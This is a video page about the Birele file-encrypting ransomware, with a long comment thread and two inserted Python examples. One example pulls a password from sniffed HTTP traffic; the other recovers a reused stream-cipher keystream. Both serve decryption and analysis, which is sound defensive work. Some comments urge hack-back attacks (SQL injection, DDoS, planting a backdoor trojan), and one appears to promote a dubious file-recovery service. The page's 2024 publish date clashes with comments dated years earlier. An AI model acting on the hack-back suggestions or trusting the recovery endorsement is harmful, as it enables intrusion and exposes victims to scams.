Birele Ransomware

  • Published 16 Sep 2024
  • I take a quick look at a new version of another file encrypting ransomware trojan. Unlike previous versions, this one leaves (nearly) no way to decrypt your files without the correct password.

Comments • 160

  • @marimeme 9 years ago +63

    A ransomware
    that actually
    delivers

    • @marimeme 8 years ago +1

      If I knew myself, but this comment is old.

    • @marimeme 8 years ago

      Just forget it, this comment is old.

    • @TomatoFriesLAN 7 years ago

      I read it as a haiku, thank god I renewed my bamboozle insurance yesterday.

    • @youtube.commentator 1 year ago +1

      @@marimeme indeed, it is

    • @getthepartystarted1247 1 year ago

      @@youtube.commentator yes it is very old indeed

  • @satanmaizono790 7 years ago +12

    "And of course, we have a JPG."
    "CRAZY RUSSIAN PORN"
    Rogueamp, you classy, classy, man.

  • @silasreel1801 10 years ago +55

    I'll send them BankInfo.txt.exe.

    • @toadette2097 9 years ago

      yea

    • @DannyProto 8 years ago

      Wow, wasn't expecting to see a Toontown fan like me here XD

  • @xander2698 10 years ago +32

    NOOOOOOO! The scry computr ting rooned me shmexy pr0nz!

  • @airee8724 8 years ago +18

    This ransomware is now obsolete.
    The IP of the web server this runs on (37.221.162.51) is no longer available.
    If you really want to, I suppose you can route 37.221.162.51 to localhost in your hosts file. I got a sample of this, and this is a quick fix, as it will not encrypt anything if it can't properly send the code.

    • @kuhascoat 4 years ago +6

      I can respect that.
      Won't encrypt if it can't make sure it can unencrypt.

  • @will5459577 8 years ago +13

    "CRAZY RUSSIAN PORN" 😆 fucking brilliant!!

    • @NascarWWE636 7 years ago

      i get that reference 😂😂😂

  • @ThePuffin77 9 years ago +32

    Change all files to .mp3

    • @ThePuffin77 9 years ago

      I mean before.

    • @ThePuffin77 9 years ago

      +minerinnorway norsk gaming For this occasion before he runs the virus.

    • @tmurfinmurfin584 8 years ago +2

      +ThePuffin77
      What a smart idea!
      Because then this may happen:
      Russian.exe INFECTED
      fakeimagedisguised.mp3 SAFE!

  • @douro20 11 years ago +1

    Birele uses AES. And I'd imagine it is implemented properly without any vulnerabilities.

  • @Pipe0481 9 years ago +13

    Send them/him a txt with the Rick roll url

  • @anentityshroudedinmystery.8037 7 years ago +3

    what is the OS used in this video?
    is this Windows 7 with the Windows 2000 interface?

  • @trit136 9 years ago +12

    What if you have the internet disconnected so the server does not receive the password?

    • @airee8724 8 years ago +7

      +don brathuhn It doesn't work. This person has the decency to not fuck you if they make no money from you.
      This is obsolete, so it doesn't matter either way. (operating server 37.221.162.51 is now shut down)

    • @smasher4291 7 years ago

      what if you get it, but have internet off, then restart and turn it on?

    • @cetusophetus5590 5 years ago +1

      @@smasher4291 please try that and let us know

  • @nightshademagia 8 years ago +1

    So basically Wireshark (or any packet analyzer) toasts this ransomware through and through.
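What a packet capture of a plain-HTTP check-in actually hands you, as an added example that is not part of the video or of any comment above: a small parser that splits a raw HTTP request (the bytes you get from Wireshark's Follow TCP Stream view) into host, path and form fields, and returns the password-like field when the request targets add.php, the script name the comments mention. The request bytes are constructed for the example and the field names id, pass and v are assumptions; the page does not show the real request format. The host is the IP quoted in the comments. If the sample had sent the check-in over TLS, this parser would see nothing, which is the point of the SSL question raised further down.

```python
"""Pull a cleartext password out of a captured HTTP check-in.

Added example, not code from the video or from the malware. The host
is the IP quoted in the comments and /add.php is the script name the
comments mention; the field names (id, pass, v) and the payload itself
are constructed for this example.
"""
from urllib.parse import parse_qsl, urlsplit

# Field names under which a check-in might carry the key. Assumed; the
# real request format is not on the page.
KEY_FIELDS = ("pass", "password", "key", "code")
CHECKIN_PATH = "/add.php"

# Constructed POST as it would appear on the wire (Wireshark ->
# Follow TCP Stream -> Raw). Content-Length is computed from the body
# so the header and body agree.
_POST_BODY = b"id=123456&pass=Q7x9kLm2pR4vWt8z&v=2"
SAMPLE_POST = (
    b"POST /add.php HTTP/1.1\r\n"
    b"Host: 37.221.162.51\r\n"
    b"User-Agent: Mozilla/4.0 (compatible)\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    + b"Content-Length: %d\r\n" % len(_POST_BODY)
    + b"\r\n"
    + _POST_BODY
)

# The same check-in sent as a GET with the fields in the query string.
SAMPLE_GET = (
    b"GET /add.php?id=123456&pass=Q7x9kLm2pR4vWt8z HTTP/1.1\r\n"
    b"Host: 37.221.162.51\r\n"
    b"\r\n"
)


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into method, host, path and form fields.

    Fields come from the query string and, for urlencoded bodies, from the
    body. Only Content-Length bytes of the body are read, so anything that
    follows the request in the capture is ignored.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].decode("ascii").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    body = body[:length]

    url = urlsplit(target)
    fields = dict(parse_qsl(url.query, keep_blank_values=True))
    ctype = headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        fields.update(parse_qsl(body.decode("latin-1"), keep_blank_values=True))
    return {
        "method": method,
        "host": headers.get("host"),
        "path": url.path,
        "fields": fields,
    }


def extract_checkin_key(raw: bytes):
    """Return the password field if the request is a check-in, else None."""
    req = parse_http_request(raw)
    if req["path"] != CHECKIN_PATH:
        return None
    for name in KEY_FIELDS:
        if name in req["fields"]:
            return req["fields"][name]
    return None


if __name__ == "__main__":
    for sample in (SAMPLE_POST, SAMPLE_GET):
        req = parse_http_request(sample)
        print(req["method"], req["host"], req["path"], extract_checkin_key(sample))
```

Run it against the raw bytes of one TCP stream at a time; a capture filter of `host 37.221.162.51` (or `http.request.uri contains "add.php"` as a display filter) narrows the streams to the one that matters.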

  • @holyjewel 11 years ago

    I really enjoy watching these types of videos in the morning, generally while drinking a Monster, or Redbull. Except, it's 1PM. I overslept, I'm too fucking sick to go to the store to get anything, and it would taste like shit, most likely. Sorry for telling you all my whole life story.

  • @_chirp_6108 8 years ago +2

    someone needs to make a virus that pops up Rickroll every 2 seconds

  • @dleedirector9831 11 years ago

    In case you haven't found it yet, it was Desktop Defender 2010.

  • @mockingbird667 11 years ago +1

    It wouldn't make any difference. Create a text file, put words in it. Then change its extension to something like .data, or, like in the video, .txt.crypt. If you try to open it with Notepad, it'll show the file's contents just fine.

  • @Strattou 11 years ago

    you did it, amp. you did the thing. i'm so proud of you.

  • @Yognaught0me 11 years ago

    avast covered that voice with "AVAST HAS SUCCESSFULLY UPDATED!"

  • @OGitsjayce 11 years ago

    both of these are system processes that are essential for your computer to run. do NOT end their processes or system trees.

  • @Abca209 11 years ago

    So rogue's been listening to some Jim Jones

  • @clem5858 11 years ago

    Wow, that's one hell of a trojan 0.0

  • @webbadger08 11 years ago

    Your user icon is a work of art

  • @Pazzknallie 11 years ago

    I miss Chad Warden. BALLIN.

  • @thedivinityman 11 years ago

    This is why I ghost copy my drive to a redundant RAID server every night. You can build one just for backups, ghost copies, etc. for less than $200. Then if your computer gets ransomed, you just reinstall and, since it is a ghost copy, restore it to right before your machine was ransomed.

  • @JangoPeppers 11 years ago

    1:14 Ballin. Jarl Ballin.

  • @zeyfuller 11 years ago

    Those are so mainstream now that that isn't really a safe assumption.

  • @fusiongamesstudios 11 years ago

    What you could do is disassemble the file and find out how it works. Then find where the data is in memory, execute the file (preferably through a debugger) and you shall find the key. Regular execution would not work, though, because it will only be in memory a fraction of a second, dependent on speeds and opcodes.

  • @yosteryosher 11 years ago +1

    YESSS GIMME DAT CRAZEEEE RUSSUAANNN PPOOORRRNNNNNNNNÑ

  • @clem5858 11 years ago

    Yeah, I love when I see your new videos in my sub box

  • @nesbroslash 11 years ago

    Those text files made me laugh pretty hard.

  • @bcordone 11 years ago

    Which ransomware was that fake AV that made your computer lock up, flashed the screen red, and played this annoying electrical sound through the speakers? I remember seeing it on Rogueamps channel.

  • @TheSteamGamer99 10 years ago

    Wouldn't there be a key to use? It needs a key to encrypt it, right? Decompiling it might help us.

  • @edison700 11 years ago

    Hmm, maybe it also affects programs, because it thinks it might have to do with a problem you are trying to resolve. The point still stands: System Restore should not affect pictures, documents, music, etc.

  • @HellShiner 10 years ago

    We Fly High You know this. You watch Chad Warden before this video xD?

  • @ALLENWinWizzy2 11 years ago

    So the amp found out about chad warden now lol.

  • @UwUshun 11 years ago

    I went to the destination IP that the .php file lies on in an attempt to see how it does it, but it asks for a log on, with the description being "bit-coin mining proxy". huh
    needless to say I couldn't log-in, and it booted me to a page saying "Sorry, I don't know you."

  • @Hotrod6045 11 years ago

    We fly high
    No lie
    You know dis
    BALLIN

  • @skepticmisfit2 11 years ago

    i think you should put that code in the description so that people can remove it easily.
    and also, gr8 files

  • @shadowdanman1000 11 years ago

    WOMAN IM LOOOOORD OF THE RINGS

  • @TheGrandMaster110 9 years ago

    Ballin'.

  • @MartijnvanBerkel 11 years ago

    I wonder how it can display "Password accepted". Does it check with the server? A file that it decrypts with known contents to test the password? Or is the password still saved on the system?

  • @ZeStealthyPwn 11 years ago

    Where would you generally get infected by a ransomware? Would the person who made it have disguised it as something too good to be true and sent it to you?

  • @zzoinks 7 years ago

    Would it be possible to decrypt a file by comparing the encrypted version to the unencrypted version the criminal sends you?

  • @4pThorpy 11 years ago

    What would happen if this was run on a machine without an internet connection? I doubt files are being uploaded to a server and changed there, or you could just send huge files at the server constantly. The encryption has to be in that exe, surely? Which would mean someone like xylitol could make a fix with a bit of OllyDbg-ing.

  • @gab1527 5 years ago

    That ransomware kills Safe Mode as well though!!!!

  • @InternetKilledTV21 11 years ago

    Wouldn't you think that the packet that sends the password would use SSL to prevent people from using sniffers to get the password?

  • @Obito313 11 years ago

    Who ever said I was a white hat D: I am curious to see if I can reverse engineer it, I mean I have several books on cryptology and I am currently developing a system of encryption, but I need something which seems like a challenge :3

  • @TheTechyButterfly 10 years ago

    That is very cool that you can use wireshark for anything

    • @TheTechyButterfly 10 years ago

      So? Aren't you a fan of something too?

    • @lyrareal 9 years ago +2

      Why are you criticising her for liking Roblox? Is it because you hate Roblox? I could also say that your grammar is bad, as that "sentence" - if I could even call it that - doesn't make sense AT ALL. Roblox also has nothing to DO with Wireshark. Come on, at least step up your game a little bit. Or are you just gonna write another complaint comment, with your one subscriber (probably you) and your 10 views?

    • @TheTechyButterfly 9 years ago

      HashtagBenches Thank you. You didn't have to stand up for me.

    • @lyrareal 9 years ago

      Roblox TheTechyButterfly Eh, no problem.

    • @HackaseSky 8 years ago +1

      +HashtagBenches This is the internet. Don't take what people say to heart

  • @norunepole 11 years ago

    ballin

  • @JazzyTheRabbit 9 years ago

    I heard on Britc09's site there is a decryption tool

  • @SlamTF2 11 years ago

    Check Google. I'm pretty sure it is a rogue so go on google or something and look it up. Generally when you type in the name of a rogue everything that comes up is warnings and bad reviews from websites like BleepingComputer.

  • @Gameboygenius 11 years ago

    I wonder if it's using RC4 or some other weaksauce crypto with an identical keystream for every file. In that case, if you have a backup of any of the files, you can recover the keystream, up to the size of that file, with some xor action. Then xor the keystream with the ciphertext to get back your precious crazy Russian porn.
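Gameboygenius's "xor action" carried through, as an added example that is not part of the original comments or of the malware: a toy encryptor that XORs every file with the same RC4 keystream (the weak design being speculated about), a recovery that takes one file's backup and its encrypted copy, XORs them to get the keystream, and then strips that keystream off a second file for as many bytes as the backup covered. The key, file contents and filenames are constructed for the example. The last function runs the same steps against a variant that mixes a per-file value into the key, where the recovery produces garbage; that is why it matters whether the sample really uses AES with a fresh IV per file, as douro20 assumes above.

```python
"""Known-plaintext keystream recovery against reused stream-cipher output.

Added example, not code from the video or the malware. The RC4 toy
encryptor stands in for the "weaksauce crypto with an identical
keystream for every file" being speculated about; the seed, file
contents and names below are constructed.
"""


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA); returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings up to the shorter length."""
    return bytes(x ^ y for x, y in zip(a, b))


def weak_encrypt(seed: bytes, name: str, data: bytes) -> bytes:
    """Flawed design: every file gets the same keystream (name is ignored)."""
    return xor_bytes(data, rc4_keystream(seed, len(data)))


def per_file_encrypt(seed: bytes, name: str, data: bytes) -> bytes:
    """Variant with a distinct keystream per file (filename mixed into the key).

    Still RC4 and still a toy; a real design uses an authenticated cipher
    with a fresh nonce per file. This only shows why the recovery stops
    working once keystreams are not reused.
    """
    return xor_bytes(data, rc4_keystream(seed + b"|" + name.encode(), len(data)))


def recover_keystream(known_plain: bytes, its_ciphertext: bytes) -> bytes:
    """C = P xor K, so K = C xor P for every byte where P is known."""
    return xor_bytes(known_plain, its_ciphertext)


def strip_keystream(keystream: bytes, ciphertext: bytes):
    """Return (recovered prefix, bytes still unknown) for another file."""
    n = min(len(keystream), len(ciphertext))
    return xor_bytes(ciphertext[:n], keystream[:n]), len(ciphertext) - n


# Constructed victim data: one file we still have a backup of, one we do not.
SEED = b"per-victim-password"
BACKUP_NAME, BACKUP = "Ballin.txt", b"We fly high, no lie, you know this. BALLIN."
LOST_NAME, LOST = "CrazyRussianPorn.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + bytes(range(64))


def attack_weak_design():
    """Recover the lost file's prefix from the backup and both ciphertexts."""
    ct_backup = weak_encrypt(SEED, BACKUP_NAME, BACKUP)
    ct_lost = weak_encrypt(SEED, LOST_NAME, LOST)
    keystream = recover_keystream(BACKUP, ct_backup)
    return strip_keystream(keystream, ct_lost)


def attack_per_file_design():
    """Same steps against per-file keystreams; the 'recovered' bytes are garbage."""
    ct_backup = per_file_encrypt(SEED, BACKUP_NAME, BACKUP)
    ct_lost = per_file_encrypt(SEED, LOST_NAME, LOST)
    keystream = recover_keystream(BACKUP, ct_backup)
    return strip_keystream(keystream, ct_lost)


if __name__ == "__main__":
    prefix, missing = attack_weak_design()
    print(prefix == LOST[: len(prefix)], missing, "bytes past the backup's length stay unknown")
    prefix, _ = attack_per_file_design()
    print(prefix == LOST[: len(prefix)])
```

The recovered prefix is only as long as the backup, so the longest file you still have a clean copy of is the one to start from; file-format headers (the JPEG magic and JFIF marker in the constructed sample) are a second source of known plaintext when no backup exists at all.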

  • @metalboySK1 11 years ago

    Where do you get these ransomwares and rogues? I would like to try some of them on my VM.

  • @TheCanadianToast 11 years ago

    Here we go, more ransomware. :P

  • @mooselexus 11 years ago

    Hi, keep up to date on this Birele Ransomware? Thanks!

  • @edison700 11 years ago

    System Restore has to do with the Windows installation and registry; it doesn't touch your files.

  • @mejftw 11 years ago

    system restore?

  • @HesitantSignal 9 years ago

    Does it send out the password every time the informer starts?

  • @nabagaca 11 years ago

    No matter what antimalware/antivirus program you use... there will always be ways around it. It's impossible to block every virus.

  • @DerpProductionz 8 years ago

    Wait, couldn't you just get Wireshark and run it again?

  • @MatMabee 11 years ago

    I just got a Dell Dimension 3000 series with 600gb just for programming viruses, and Trojans. I spent $30 on the computer.

  • @thedivinityman 11 years ago

    I could install Linux, but I prefer to be productive. I am a certified Microsoft, apple, and GNU/Linux tech, and for productivity Windows is the best

  • @danielwickham3439 6 years ago

    IT ISSSSSS FUCKED that was so funny

  • @neviemdopice 10 years ago

    what happens when you run it again? You could spam add.php to see what happens :)

  • @Obito313 11 years ago

    Do you know which type of encryption method it uses? This seems very interesting and I feel like I would like to take the challenge to decrypt it :) I mean pm me a link to where I can download this so I can take a crack at it :O

  • @vladdracula1485 10 years ago +4

    But what happens if you get it and you send them a DDoS or SQL in that one file you're allowed to send them?

    • @vladdracula1485 10 years ago +2

      But their antivirus or protection will block it, and since they're able to design something like this they're bound to be grey hat hackers, so it'll be easy for them to counter the rogue. But SQL injects can bypass their defense systems, and denial of service will stop them from destroying your data for sending them an SQL.

    • @negativize_11 10 years ago

      That Stupid Guy That Will Slap Your Face Send them the Fagot virus.
      It'll infect them AND call them a fagot at the same time.
      t-t-t-torture breaker

    • @radostin04wastaken 10 years ago

      If I get infected with this I will send them the Gruel virus or the Internet Security rogue.

    • @vladdracula1485 10 years ago

      A good one would be Trojan.ZeroAccess, if you've got experience with it. Because ZeroAccess basically sneakily gets into their system, deactivates internet security, then opens a backdoor and installs a tonne of other viruses which crash their computer. With the backdoor you basically get control over the system, and you can get the passkey to unlock your system by yourself from their computer :D

    • @mustangrt8866 10 years ago

      I'd be sending something which can blow their machine up, with some kind of overflow

  • @SuperMewio 11 years ago

    Ctrl+F5 fixed it for me.

  • @St_Rizla 8 years ago

    all the test files are a reference to Chad Warden lol

  • @vinc544495 11 years ago

    You weren't first... I WAS!

  • @mikek17 11 years ago

    Dammit, I just recorded a whole video of this!

  • @AllHaiLKINGTIsHeRe3 11 years ago

    Yeah, I'm sure.

  • @gampixi 11 years ago

    The code is different every time so it's no use.

  • @ReCkLeSsErr0r 11 years ago

    Looks like they're getting their money through bitcoins... They are gonna be impossible to track down... Damn :(

  • @aten747official 11 years ago

    now that's just mean.

  • @mustangrt8866 10 years ago +1

    crack the program with a decompiler and get the key and the parameters

    • @atranshumanisttranshuman 10 years ago

      ... It reads it off of a server, and said server has authentication. That wouldn't work.

    • @biigsmokee 9 years ago +3

      Mustang is right.
      The way this works is by generating a private seed to encrypt with, which is what that identification number is. So say each install's password seed is: identification number + "xOdpdDFPG40fxZ"; if you decompiled it you could get the seed, and thus the password.

    • @Happigail_Adams 8 years ago +1

      +.Float what's preventing this thing from having a preset pattern, if the password does not match the pattern, why interact with the server at all?
      or you can enter an incorrect password with the correct pattern, it would contact the server then realize it's the incorrect password.
      nothing is preventing the owner from keeping the key and the parameters on a private disposable server and sending it when the password is correct.

    • @biigsmokee 8 years ago

      Ticha360 What?

  • @thepirategamerboy12 11 years ago

    So, we can still watch our porn videos. This Ransomware is somewhat nice, I guess.

  • @mooselexus 11 years ago

    Try "Emsisoft Harasom Decrypter". Maybe it will decrypt this ransomware? Let me know? Write Emsisoft Anti-Malware support for the Decrypter!

  • @stonecrestmovies 11 years ago

    Sup bitches. It's Chad Warden here.

  • @TheDesius 11 years ago

    Good thing I run Comodo.
    No virus will ever come on my PC as long as I have Comodo on it :) it has the best behavior blocker ever

  • @yadsmoodxD 11 years ago +2

    He said it generates a random password,
    so there is no actual password.

  • @samchem1020 10 years ago

    $300 is a lot of money to pay.

    • @HackaseSky 8 years ago

      You're already stupid enough to download ransomware, right?

  • @thepirategamerboy12 11 years ago

    Oh, I see it's a stupid program that throws up some random message boxes. How nice.

  • @caffeinepizza 11 years ago

    Good thing I run Linux.

  • @mooselexus 11 years ago

    in front of the tmp to download

  • @vinc544495 11 years ago

    Nice :D

  • @thepirategamerboy12 11 years ago

    What is this?

  • @Yognaught0me 11 years ago

    Idk 'bout rthdco.exe and smss.exe, but if it is under the owner user etc. you MAAAAY wanna end the process.

  • @GreenGuy9001 11 years ago

    That'sSomeCrazyPorn.jpg.jpg.. Wut.txt

  • @TheOnlyRounder 11 years ago

    Lol porn.jpg on the desktop

  • @RetroPlus 6 years ago

    It's pronounced Baigh-real-ayyyyyyyyyyyy lmao

  • @MatMabee 11 years ago

    Test.

  • @davidjl 11 years ago

    lol

  • @Kn270 11 years ago

    porn.jpg

  • @tamag9 11 years ago

    Or just use Linux.

  • @clem5858 11 years ago

    Lol

  • @chezer9236 8 years ago

    OMG jpg file

  • @TheDesius 11 years ago

    Can you send me a download link (in pm) to this virus so I can test it on a virtual machine

  • @vinc544495 11 years ago

    Me 2

  • @lordcybertoolz2034 3 years ago

    *Jones_Tec* is reliable when it comes to recovery of files. He's a genius without any delay.

  • @mooselexus 11 years ago

    Put in h ttps://